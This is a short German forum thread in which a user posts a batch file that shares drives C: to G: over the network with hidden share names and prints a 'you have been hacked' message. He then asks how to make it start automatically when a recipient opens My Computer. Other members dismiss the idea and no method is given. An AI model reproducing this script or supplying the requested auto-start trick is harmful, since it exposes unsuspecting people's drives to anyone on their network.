.bat Dateien

  • #1
T

Tom Engelhardt

Guest
hi,

hab nen kleines hackprogramm gemacht:

net share $hackc=c:
net share $hackd=d:
net share $hacke=e:
net share $hackf=f:
net share $hackg=g:
echo you have benn hacked!! mwhhahahhaha!
pause


kann mir jemand von euch sagen wie ich das so umschreiben kann dass wenn ich auf arbeitsplatz gehe das die .bat datei sofort gestartet wird?
 
  • #2
habs mir nochmal durch den kopf gehen lassen!
Kann es sein dass das garnicht geht?
man müsste ja dann den arbeitsplatz umschreiben oda?

gruß
hil
 
  • #3
Kann das sein das das totaler Schwac....inn ist was du da vor hast :mad:
 
  • #4
warum? weils unmöglich ist oder weils die festplatten im netzwerk freigibt und alle auf der lan drauf zugreifen können?
 
  • #5
Unmöglich will ich nicht behaupten, aber Unsinn ist's allemal.

Entweder du gibst ein LW vernünftig über die Freigabe frei, oder du lässt es. ;)
Ein ganzes LW freigeben ist IMHO eh nicht so der wahre Jacob ;)
 
  • #6
soll ja nur spass sein mit den laufwerken freigeben ich sag den leuten den ich die .bat geschickt hab das alle laufwerke freigegebn werden, wollte einfach nur fragen ob jemand ne lösung dafür hat ob man die bat datei auch automatisch starten lassen kann wenn man auf arbeitsplatz geht oda auf netzwerkumgebung oder so

gruß
hil
 
Thema:

.bat Dateien

ANGEBOTE & SPONSOREN

Statistik des Forums

Themen
113.839
Beiträge
707.962
Mitglieder
51.492
Neuestes Mitglied
Janus36
Oben